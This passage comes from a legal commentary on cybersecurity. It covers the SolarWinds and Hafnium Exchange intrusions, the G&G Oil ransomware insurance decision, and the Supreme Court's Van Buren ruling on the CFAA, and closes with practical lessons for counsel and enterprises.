II. SolarWinds Incident—Creation of Persistently Insecure, Digital-Based Systems
In mid-December 2020, software firm SolarWinds disclosed that its information technology platform, Orion, had been hacked an indefinite number of months earlier. Malicious actors (reportedly of Russian intelligence service SVR) had carried out a sophisticated, stealthy intrusion and remained undetected in targeted systems and networks for at least nine months. The intrusion included malware planted “in a routine software upgrade” of SolarWinds’ Orion program, which “keeps a watchful eye on all the various components in a company’s network,” and affected customers located within SolarWinds’ supply chain.
On December 13, 2020, the Department of Homeland Security Computer Readiness Team issued Emergency Directive 21-01 (“ED 21-01”). ED 21-01 appears to have been premised on several features of the incident: first, the unusual scope and severity of the attack (“over 17,000 organizations downloaded the infected back door”); second, the lengthy period during which it continued without detection; and third, a determination that the incident created “persistence in the [computer network] environment” with the result that it appears uncertain whether it will be possible to eradicate the malicious actors and the malware they secreted in targeted systems. ED 21-01 cautioned: “SolarWinds Orion products . . . are currently being exploited by malicious actors. This tactic permits an attacker to gain access to network traffic management systems. Disconnecting affected devices . . . is the only known mitigation measure currently available.” Estimates (made in March 2021) predicted that agencies, attempting to rebuild their networks from scratch, may need “in the neighborhood of 12 to 18 months.”
Law firms whose clients included any of the affected enterprises might still be at risk through digital communications with such clients. The electronic filing system that federal courts use was compromised. In the immediate aftermath, some security experts viewed the attack as “an inflection point” and believe it should be recognized as reflecting certain paradigm shifts, including:
- The attack methods show that the intruders understood in detail the step-by-step procedures that software companies use internally to initiate, build, test, and release updates; this fact will (or should) “change the way that large enterprises think about the software they install and think about how they handle updates.”
- And worse, enterprises now need to ask “What if the hackers planted the seeds of future attacks during that nine months they explored SolarWinds’ customer networks—did they hide code for backdoors that will allow them to come and go as they please at a time of their choosing? . . . Will we find out later that the SolarWinds hack set the stage for something more sinister? . . . [N]ations are targeting [the] private sector . . . .”
In early March 2021, Microsoft disclosed that certain users of its email and calendar program Exchange and the program’s operational server had experienced a highly sophisticated cyberattack, reportedly executed by a malicious actor, known as Hafnium, that is located in the People’s Republic of China, but that “conducts its operations primarily from leased virtual private servers (VPS) in the United States.” Microsoft explained that Hafnium has historically selected U.S. entities as its main targets, with the aim of exfiltrating data from enterprises in several industry sectors, including law firms. The victims of the hack reportedly extended to upwards of 30,000 Microsoft customers, including federal agencies and private enterprises (particularly small and medium size businesses).
The Hafnium attack started in January 2021, escalated in late February, and continued into March 2021. In response, Microsoft released multiple security updates or “patches.” When Microsoft observed that multiple bad actors continued to take advantage of unpatched systems “to attack organizations with on-premises Exchange Server,” Microsoft endeavored to aid defenders in investigating the attacks by releasing a set of “observed indicators of compromise” in the form of “malware hashes and known malicious file paths”; a week later, Microsoft released a “new one-click mitigation tool . . . to help customers who do not have dedicated security or IT teams to apply security updates for Microsoft Exchange Server.”
However, due in part to limitations in technical expertise at many commercial victims, hundreds of servers remained vulnerable. In response, the Federal Bureau of Investigation (“FBI”) sought and obtained judicial authorization to enter electronically many of the victims’ computer networks, search for and locate the “web shells” lodged there by Hafnium, and execute code that would cause those shells to issue a command to the company’s server that they be deleted. As the FBI explained to the District Court:
most of these victims are unlikely to remove the remaining web shells because the web shells are difficult to find due to their unique file names and paths or because these victims lack the technical ability to remove them on their own.
In short, without the knowledge of the affected enterprises, the FBI obtained a search warrant from a U.S. District Court “to seize and copy from Microsoft Exchange Servers located in the United States the web shells identified in [an attachment], and to delete the web shells from those servers.”
The FBI’s novel and extraordinary action did not provide complete remediation for affected enterprises. Removal of the web shells did not identify or remove any other malware that Hafnium may have secreted in each targeted enterprise’s servers and networks. Moreover, whatever vulnerabilities Hafnium may have exploited, it’s possible that the array of Microsoft’s security patches (over twenty-five of which Microsoft released in March and early April 2021) might not have addressed all the Exchange Server zero-day vulnerabilities known to the Hafnium intruders. It’s possible that the same or different intruders could “plant another web shell” and resume the intrusion, exfiltrate information, or modify key operational data to cause kinetic damage.
III. G&G Oil Co. of Indiana, Inc. v. Continental Western Insurance Co.
When advising clients on responses to a ransomware attack, there are multiple uncertainties. They include:
- Can we restore access to systems and data needed for resumption of at least degraded operations? (Possibly, but the prolonged disruption of Colonial Pipeline and other critical infrastructure targets of ransomware suggests many enterprises have not prepared sufficiently for that contingency.)
- Can we negotiate a reduction in the demanded payment? (Possibly. If the target is a hospital the attackers may be willing to consider reductions or even to “decrypt for free,” as one ransomware group, DoppelPaymer, says it will do, but the FBI “advises victims to avoid negotiating with hackers, arguing that paying ransoms incentivizes criminal behavior.”)
- Can we lawfully pay the intruders? (Possibly not, if there’s reason to believe the payment, without a license from the U.S. Department of the Treasury, Office of Foreign Assets Control (“OFAC”) will violate any of the U.S. economic sanctions regulations.)
- Can counsel’s firm ethically pay or advise on making such payment to a criminal? (Possibly, but it is peculiar that despite the multitude of ransomware attacks, no bar association in the United States has issued an ethics opinion that addresses that issue; apparently the sole ethics opinion to date comes from the Queensland Law Society, which addressed the issue of whether a law firm may ethically pay a ransom to recover access to client data in the firm’s computers:
On balance, the clear obligation to protect client interests tends to outweigh the general public policy objection to paying criminals. Payment of the ransom is therefore an option available to the firm once all of the competing alternatives have been considered. . . . If lawful, we are entitled to make the decision based on what we think will lead to the best outcome for the client and our firm . . . .
As an aside, if the attackers have had access to compromised systems there is a clear ethical duty to warn clients that this has occurred. So “pay up and keep quiet” is only possible where there is no way the intruders could have client data.
- If we pay, will the intruders release the encryption passwords or keys and restore our access to our data? (Possibly, but they may demand additional amounts; and that risk raises an equally salient question: did intruders exploit their access to modify critical data randomly, rendering the data unreliable and potentially hazardous if utilized?)
For any enterprise considering making a payment to hackers, a key question may be whether the insurer will view the payment and the costs imposed by the disruption of operations as covered by the terms of the issued policy. The Supreme Court of Indiana, in a case of first impression, answered that question under Indiana law in G&G Oil Co. of Indiana v. Continental Western Insurance Company.
In November 2017, hackers executed a ransomware attack on G&G Oil Co. of Indiana (“G&G”). Unable to access its servers and most workstations, G&G paid the demanded bitcoin ransom. But the hackers refused to restore G&G’s control over its servers and demanded an additional payment. G&G ultimately paid the additional ransom (for a total of $34,477.50) (“Ransom Payment”); the hackers sent passwords enabling G&G to decrypt and regain access to its servers.
G&G submitted a claim to Continental Western Insurance Company, the issuer of its multi-peril commercial policy. G&G relied on the policy’s Computer Fraud clause (“Computer Fraud Clause”), which read:
We will pay for loss of or damages to “money” . . . and “other property” resulting directly from the use of any computer to fraudulently cause a transfer of that property from inside the “premises” . . . .
a. To a person . . . outside those “premises”; or
b. To a place outside those “premises.”
Continental denied G&G’s claim on two grounds. First, G&G had not purchased an optional Computer Virus and Hacking Coverage (“Hacking Coverage”). Second, Continental viewed the Ransom Payment as a loss that did not result directly from the “use of a computer to fraudulently cause a transfer of G&G’s funds.”
G&G filed a complaint seeking a judgment to require Continental to indemnify G&G for the Ransom Payment loss. The trial court granted Continental’s cross-motion for summary judgment. G&G appealed. The Court of Appeals of Indiana affirmed, adopting Continental’s argument that the hacker did not commit an act that qualified as “fraud.” With no “fraud” committed, the Court of Appeals reasoned that the hacker’s actions did not come within the Hacking Coverage for use of a computer to “fraudulently cause” a transfer of money, nor to “fraudulently cause” G&G to “purchase Bitcoin to pay as ransom.” The Court of Appeals seemingly viewed the hacker as an honest thief; although illegal, “there was no deception involved” in the hacker’s ransom demand. No deception, no fraud, no coverage by the Computer Fraud Clause for loss caused by “use of any computer to fraudulently cause a transfer” of money.
G&G appealed to the Supreme Court of Indiana, which reversed. The Supreme Court of Indiana found persuasive the Seventh Circuit’s definition of “fraud” (albeit in the context of bankruptcy): “it includes all surprise, trick, cunning, dissembling, and any unfair way by which another is cheated.” With that as a guide, the Supreme Court of Indiana construed the term “fraudulently cause a transfer” to mean “simply ‘to obtain by trick.’”
Applying that criterion, the court found neither party had demonstrated entitlement to summary judgment. G&G’s evidence fell short, because not every ransomware attack is perforce fraudulent. An enterprise’s cybersecurity becomes a gauge of whether a hacker needed to resort to a “trick.” As the court explained, “if no safeguards were put in place [by G&G], it is possible a hacker could enter a company’s servers unhindered and hold them hostage. There would be no trick there.” Continental’s evidence fell short for the same reason. The court found it unclear whether the hacker gained access to G&G’s computer systems by “trick.”
The court then addressed whether the Ransom Payment loss was one “resulting directly from the use of a computer” as required by the Policy’s Computer Fraud Clause. Continental argued that G&G’s “voluntary transfer of Bitcoin was an intervening cause that severed the causal chain of events” and thereby disconnected the Ransom Payment loss from a direct use of a computer. The court disagreed, finding that G&G’s Ransom Payment was only “voluntary” in the sense that G&G acted consciously. But the court sagaciously reasoned that “the payment more closely resembled one made under duress,” and therefore it was “not so remote that it broke the causal chain” required for G&G’s losses to have “resulted directly from the use of a computer.”
IV. Van Buren v. United States
Georgia police sergeant Van Buren asked acquaintance Albo for a personal loan. Albo secretly recorded the request and shared it with a sheriff ’s office, alleging Van Buren tried to “shake him down” for cash. The FBI received the recorded conversation and set up a “sting” operation: Albo would offer Van Buren about $5,000 to search the state law enforcement computer database for a license plate “purportedly belonging to a woman whom Albo had met at a local strip club.” Van Buren agreed. Operating his patrol-car computer, he used credentials that gave him authorized access to the law enforcement database of license plate data records. Van Buren searched the database, found the requested license-plate entry (unaware the FBI had created it), and told Albo he could disclose it to him. Van Buren’s use of the data violated his police department’s prohibition on use of police computers for personal purposes.
The federal government indicted Van Buren under the CFAA, alleging he accessed a computer while “exceed[ing] authorized access.” A jury convicted Van Buren and the Eleventh Circuit affirmed. The U.S. Supreme Court granted certiorari to resolve the split among the circuit courts in interpreting the scope of liability under the CFAA’s “exceeds authorized access” clause.
Government and defendant agreed that defendant had authorization to access the subject computer when he “used his patrol-car computer and valid credentials to log into the law enforcement database.” They disputed whether defendant was “entitled so to obtain” the license-plate record—if not, defendant violated the CFAA. Justice Barrett, writing the opinion of the Court (for a 6 to 3 majority), framed the issue as one of statutory construction: what did “so” mean in the context of that CFAA prohibition against exceeding “authorized access,” which the CFAA defines as occurring when anyone accesses “a computer with authorization and . . . use[s] such access to obtain . . . information in the computer that the accesser is not entitled so to obtain.”
Defendant argued that the disputed phrase “is not entitled so to obtain” means that if a person is authorized to access information in a computer, there is no violation of the CFAA even if he accesses or uses that information for an unauthorized purpose. The government argued that the CFAA is violated if a person is authorized to access the information but does so for an unauthorized purpose.
The Court agreed with the defendant. Explaining her conclusion, Justice Barrett offered a cogent spatial metaphor that referred to “access” and “authorization” as resembling a portcullis or gate “up-or-down.” Justice Barrett reasoned that defendant’s interpretation, unlike the government’s, treated the “without authorization” and “exceeds authorized access” clauses consistently:
Under Van Buren’s reading, liability under both clauses stems from a gates-up-or-down inquiry—one either can or cannot access a computer system, and one either can or cannot access certain areas within the system. And reading both clauses to adopt a gates-up-or-down approach aligns with the computer-context understanding of access as entry.
By contrast, the government’s reading would create an illimitable risk of criminalizing “every violation of a computer-use policy,” turning “millions of otherwise law-abiding citizens” into criminals.
The Court concluded that defendant “did not ‘excee[d] authorized access’ to the database, as the CFAA defines that phrase, even though he obtained information from the database for an improper purpose.” The Court reversed the judgment of the Eleventh Circuit and remanded the case for further proceedings consistent with its opinion.
V. Conclusion—Pragmatic Lessons
When a HILF cyber event like SolarWinds occurs, the breached enterprises might never be able to determine with certitude whether the intruders have been expelled, their secreted malware contained, disabled, or eradicated, whether all adverse effects are over, or even whether the scope of the attack and damage have been ascertained. Henceforth, counsel and clients may need to assume the persistent presence of malware and even the continued presence of cyber actors in the enterprise until it can be verified reliably that intruders and malware have indeed been eradicated. But at this time, the possibility of verification that “all’s clear” in a digital system remains uncertain.
In light of the emergence of HILF events, counsel might see if it can coax a client to “stress test” and reevaluate its cyber security safeguards. This may require reevaluation of steps the enterprise has taken that facilitate remote work during the pandemic, but that may have sacrificed data safeguards.
The G&G Oil decision suggests that an insured enterprise may be disqualified from recovering on a claim for losses resulting from a ransom payment or disruption of its operations if a court determines that the intruders gained access, not with a “trick,” but through a security lapse or other security deficiency.
After Van Buren, enterprises can no longer rely on invoking the criminal prosecution under the CFAA to deter personnel from violating workplace policies on use of company data. If personnel have authority to access the computer, directory, and files containing the data, preventing insider threats and misuse of the data remains an enterprise responsibility.
Enterprise security is often designed to ask good people to do good things and relies on them to do it. Unfortunately, such security proves no match for when good people err, are tricked by a clever social engineering ploy, or when they sour and enlist their ingenuity to do bad things with sensitive data. We might do better to limit our trust to where the consequences of misplaced trust are trivial. But what are we do to about systems where misplaced trust would cause catastrophic disruptions and where experience of recent HILF events teaches us that such systems remain persistently insecure?